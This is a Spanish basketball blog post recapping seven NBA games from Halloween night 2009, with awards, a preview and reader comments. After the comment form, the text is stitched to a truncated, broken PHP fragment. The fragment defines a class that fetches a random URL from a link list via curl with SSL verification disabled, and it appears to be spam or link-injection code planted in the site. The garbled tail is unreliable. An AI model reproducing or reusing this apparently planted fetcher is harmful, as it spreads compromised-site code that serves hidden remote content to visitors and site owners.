La crónica (01/11/2009)

01 de November de 2009 por txusma

7 partidos se disputaron esta noche de Halloween, con resultados más o menos previsibles.

Para empezar Dallas no permitió que los Clippers salieran de su pesadilla yLos 3 acumulan una nueva derrota (y ya van 4) esperando como agua de Mayo a Griffin. De momento el único que mete miedo es Kaman que se fue a 27 puntos y 11 rebotes. Los tejanos no jugaron mucho mejor pero les bastó con una poción con mucho Nowitzki, algo de Marion y una pizca de Terry para salir victoriosos.

Tampoco los Wizards (buen nombre para una noche como esta), dejaron que la rana Nets se conviertiera en príncipe y aunque permitieron 102 puntos, ganaron con superioridad en el rebote y en el marcador gracias a los 32 puntos de Arenas y a los 30 de Andray Blatche.

Por su parte, Cleveland consiguió poner en su casillero tantas victorias como derrotas tras su mal inicio de temporada, gracias esta vez a Mo Williams, aunque por supuesto “el Elegido” rozó el triple doble. Lo mejor para Cleveland es que recuperaron a West que aportará mucho a una intendencia que tanta falta hace en este equipo. DefensaEnfrente los Bobcats de la bruja Larry Brown siguen jugando rácanamente, sin llegar a 80 puntos y con casi tantas pérdidas como asistencias.

Festival de puntos con prórroga incluida en la Gran Manzana entre unos Knicks que encadenan la 3 derrota consecutiva pese a los 42 puntos de Harrington y los 30 de Gallinari, y unos sorprendentes Sixers donde sobresalió Iguodala acercándose al triple con 32 puntos, 11 rebotes y 8 asistencias. El poderío en el rebote, con 3 jugadores en dobles dígitos, y una gran prórroga dieron la victoria a los de Philadelphia.

Decepción para los chicos de Portland en su visita a Houston. En especial para Brandon Roy que pese a hacer un partido sobresaliente en lo individual yéndose a 42 puntos, no consiguió llevarse el gato al agua. No pinta bien el equipo de McMillan, con problemas en la distribución, en las alas y con una falta de ideas alarmante. ¿Tendrá que ver algo lo de Andre Miller? No, no vamos a ser malos. A los Rockets sólo les hizo falta algo de agresividad en defensa y un juego exterior decente con un Ariza sobresaliente para conseguir su segunda victoria.

Parker contra todosEn otro de los partidos en el que ninguno de los 2 equipos llegó a 100, los Bucks derrotaron a los Pistons con lo poquito que tienen. Los 24 puntos de Jennings y un rebote de equipo importante fueron más que suficiente para ganar al equipo de Detroit en el que la baja de Hamilton se hizo un muro infranqueable. 20 pérdidas de balon por 17 asistencias lo dice todo. Gordon hizo lo que pudo, pero todavía se espera a Villanueva al que parece que le está pesando la responsabilidad.

En el último partido de la jornada los Spurs no se dejaron sorprender por unos Kings que llegaron a utilizar 12 jugadores y en los que tan sólo Kevin Martin y Spencer Hawes plantearon algo de batalla. En los Spurs 24 de Parker y, por fin, 21 de Jefferson y a otra cosa mariposa.

PREMIOS

M.V.P: Buenas actuaciones en casi todos partidos. A destacar los 33 puntos de Ariza y los 32 de Iguodala. Como el de Philadelphia añadió a su cosecha 11 rebotes y 8 asistencias, el premio para él.

Rookie: De nuevo Brandon Jennings se hace con el galardón gracias a sus 24 puntos que además sirvieron para ganar. Dos seguidas, ummh, interesante.

Sorpresa: Jornada de pocas sopresas. Que Lebron no haga más de 14 puntos y su equipo además gane es sin duda una sorpresa, pero creo que nos quedaremos con los 42 de Harrington.

Decepción: 3 partidos de 7 con ninguno de los equipos por encima de 100 puntos es una decepción en si misma. Pero afinaremos más y destacaremos el “juego”, por decir algo, de los Bobcats. En especial los 10 puntos y 8 pérdidas de Felton que sigue con su paseo por los abismos.

Mayor Esfuerzo en Vano. Los 42 de Harrington evidentemente van aquí, junto a los 42 de Roy en su derrota frente a Houston

Razones para trasnochar

Otros 7 partidos nos esperan esta noche con mucha participación española. A destacar el Orlando – Toronto que nos servirá para ver las fuerzas de 2 de los gallitos del Este. Chicago – Miami y New Orleans – Boston serán los otros 2 partidos interesantes de la jornada. Es Este está en juego. Si tenéis fuerzas podéis quedaros hasta ver si Carmelo sigue en su línea o no y la cara que presentan esta vez los Ositos de nuestro Marc Gasol. Si queréis ver a Pau yo no trasnocharía demasiado, ya que hay pocas esperanzas de que juegue esta noche ante Atlanta en el último partido de la jornada.

Comenta

6 comentarios a esta entrada

  1. Txusma dice:
    #1

    8 de 16 el amigo Gallinari en triples… Ha sido empezar la temporada y empezar a ametrallar el aro contrario.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Salió del campo Steve Blake con problemas en la rodilla. ¿estará histérico McMillan?

    Monumento a los Rockets,,

      Citar

  3. M dice:
    #3

    El porcentaje de Gallinari está muy bien, pero tirar 16 triples en un partido…bueno, la verdad es que me cuesta cambiar el chip FIBA en estas cosas, la verdad.

    ¿Blake sale con la hija de McMillan o algo?. Que bárbaro.

      Citar

  4. kantonyo dice:
    #4

    Me está sorprendiendo gratamente Brandon Jennings. Ojo a este dato:

    Inicio del 3er Cuarto: Pistons – 49 – Bucks – 38 – // BJennings: 3 puntos

    Minuto 2 del 3er Cuarto: Pistons – 57 – Bucks – 67- // BJennings: 19 puntos

    Esto está al alcance de muy pocos….

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Tremendo Batmanu

      Citar

  6. Txusma dice:
    #6

    Pobre murcielagito y que calvita le esta saliendo a Ginobili…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>